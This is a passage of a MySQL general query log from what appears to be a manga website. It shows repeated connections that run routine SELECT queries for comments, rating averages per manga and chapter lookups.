'945' 330638216 Quit 330638217 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638217 Query select * FROM comments where parent_id = '883' 330638217 Quit 330638218 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638218 Query select * FROM comments where parent_id = '847' 330638218 Quit 330638219 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638219 Query select * FROM comments where parent_id = '820' 330638219 Quit 330638220 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638220 Query select * FROM comments where parent_id = '731' 330638220 Quit 330638221 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638221 Query select * FROM comments where parent_id = '180' 330638221 Quit 330638222 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638222 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330638222 Quit 330638223 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638223 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330638223 Quit 330638224 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638224 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '136' order by created desc 330638224 Quit 330638225 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638225 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330638225 Quit 330638226 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638226 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330638226 Quit 330638227 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638227 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330638227 Quit 330638228 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638228 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '141' order by created desc 330638228 Quit 330638229 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638229 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330638229 Quit 330638230 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638230 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330638230 Quit 330638231 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638231 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330638231 Quit 330638232 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638232 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330638232 Quit 330638233 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638233 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '96' order by created desc 330638233 Quit 330638234 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638234 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330638234 Quit 330638235 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638235 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '157' order by created desc 330638235 Quit 330638236 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638236 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330638236 Quit 330638237 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638237 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330638237 Quit 330638238 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638238 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330638238 Quit 330638239 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638239 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '137' order by created desc 330638239 Quit 330638240 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638240 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330638240 Quit 330638241 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638241 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330638241 Quit 330638242 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638242 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330638242 Quit 330638243 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638243 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '150' order by created desc 330638243 Quit 330638244 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638244 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330638244 Quit 330638245 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638245 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330638245 Quit 330638246 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638246 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '25' order by created desc 330638246 Quit 330638247 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638247 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '149' order by created desc 330638247 Quit 330638248 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638248 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '135' order by created desc 330638248 Quit 330638249 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638249 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330638249 Quit 330638250 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638250 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330638250 Quit 330638251 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638251 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '163' order by created desc 330638251 Quit 330638252 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638252 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330638252 Quit 330638253 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638253 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330638253 Quit 330638254 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638254 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330638254 Quit 330638255 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638255 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330638255 Quit 330638256 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638256 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '131' order by created desc 330638256 Quit 330638257 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638257 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330638257 Quit 330638258 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638258 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330638258 Quit 330638259 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638259 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '158' order by created desc 330638259 Quit 330638260 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638260 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '152' order by created desc 330638260 Quit 330638261 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638261 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '166' order by created desc 330638261 Quit 330638262 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638262 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330638262 Quit 330638263 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638263 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330638263 Quit 330638264 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638264 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '61' order by created desc 330638264 Quit 330638265 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638265 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '132' order by created desc 330638265 Quit 330638266 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638266 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '160' order by created desc 330638266 Quit 330638267 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638267 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330638267 Quit 330638268 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638268 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330638268 Quit 330638269 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638269 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '142' order by created desc 330638269 Quit 330638270 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638270 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '140' order by created desc 330638270 Quit 330638271 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638271 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330638271 Quit 330638272 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638272 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330638272 Quit 330638273 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638273 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '169' order by created desc 330638273 Quit 330638274 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638274 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '55' order by created desc 330638274 Quit 330638275 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638275 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '133' order by created desc 330638275 Quit 330638276 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638276 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330638276 Quit 330638277 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638277 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330638277 Quit 330638278 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638278 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330638278 Quit 330638279 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638279 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330638279 Quit 330638280 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638280 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330638280 Quit 330638281 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638281 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '151' order by created desc 330638281 Quit 330638282 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638282 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330638282 Quit 330638283 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638283 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '146' order by created desc 330638283 Quit 330638284 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638284 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '170' order by created desc 330638284 Quit 330638285 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638285 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '138' order by created desc 330638285 Quit 330638286 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638286 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330638286 Quit 330638287 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638287 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330638287 Quit 330638288 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638288 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330638288 Quit 330638289 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638289 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330638289 Quit 330638290 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638290 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330638290 Quit 330638291 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638291 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330638291 Quit 330638292 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638292 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330638292 Quit 330638293 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638293 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330638293 Quit 330638294 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638294 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330638294 Quit 330638295 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638295 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330638295 Quit 330638296 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638296 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330638296 Quit 330638297 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638297 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '167' order by created desc 330638297 Quit 330638298 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638298 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '145' order by created desc 330638298 Quit 330638299 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638299 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '69' order by created desc 330638299 Quit 330638300 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638300 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '144' order by created desc 330638300 Quit 330638301 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638301 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '165' order by created desc 330638301 Quit 330638302 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638302 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '148' order by created desc 330638302 Quit 330638303 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638303 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '154' order by created desc 330638303 Quit 330638304 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638304 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330638304 Quit 330638305 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638305 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330638305 Quit 330638306 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638306 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330638306 Quit 330638307 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638307 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330638307 Quit 330638308 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638308 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330638308 Quit 330638309 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638309 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330638309 Quit 330638310 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638310 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '56' order by created desc 330638310 Quit 330638311 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638311 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330638311 Quit 330638312 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638312 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330638312 Quit 330638313 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638313 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330638313 Quit 330638314 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638314 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330638314 Quit 330638315 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638315 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330638316 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638316 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330638316 Quit 330638315 Quit 330638317 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638317 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '164' order by created desc 330638317 Quit 330638318 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638318 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330638318 Quit 330638319 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638319 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330638319 Quit 330638320 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638320 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330638320 Quit 330638321 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638321 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330638321 Quit 330638322 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638322 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '79' order by created desc 330638322 Quit 330638323 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638323 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330638323 Quit 330638324 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638324 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330638324 Quit 330638325 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638325 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330638325 Quit 330638326 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638326 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '134' order by created desc 330638326 Quit 330638327 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638327 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330638327 Quit 330638328 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638328 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330638328 Quit 330638329 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638329 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '162' order by created desc 330638329 Quit 330638330 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638330 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330638330 Quit 330638331 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638331 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330638331 Quit 330638332 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638332 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330638332 Quit 330638333 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638333 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330638333 Quit 330638334 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638334 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '139' order by created desc 330638334 Quit 330638335 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638335 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330638335 Quit 330638336 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638336 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '161' order by created desc 330638336 Quit 330638337 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638337 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330638337 Quit 330638338 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638338 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330638338 Quit 330638339 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638339 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330638339 Quit 330638340 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638341 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638341 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330638342 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638341 Quit 330638340 Quit 330638342 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '2025' 330638343 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638343 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330638343 Quit 330638342 Quit 330638344 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638344 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330638344 Quit 330638345 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638345 Query select * FROM chapters where id = '2025' 330638346 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638346 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330638345 Quit 330638346 Quit 330638348 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638347 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638347 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330638348 Query select * FROM chapters where manga_id = '51' order by id desc 330638347 Quit 330638349 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638349 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330638349 Quit 330638350 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638350 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330638350 Quit 330638351 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638351 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '171' order by created desc 330638351 Quit 330638352 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638352 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330638352 Quit 330638353 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638353 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330638353 Quit 330638354 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638354 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330638354 Quit 330638355 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638355 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '156' order by created desc 330638355 Quit 330638356 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638356 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330638356 Quit 330638357 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638357 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330638357 Quit 330638358 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638358 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '168' order by created desc 330638358 Quit 330638359 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638359 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '147' order by created desc 330638359 Quit 330638360 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638360 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330638360 Quit 330638361 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638361 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330638361 Quit 330638362 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638362 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330638362 Quit 330638363 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638363 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330638363 Quit 330638364 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638364 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330638364 Quit 330638365 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638365 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330638365 Quit 330638366 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638366 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330638366 Quit 330638367 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638367 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330638367 Quit 330638368 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638368 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330638368 Quit 330638369 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638369 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330638369 Quit 330638370 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638370 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330638370 Quit 330638371 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638371 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330638371 Quit 330638372 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638372 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330638372 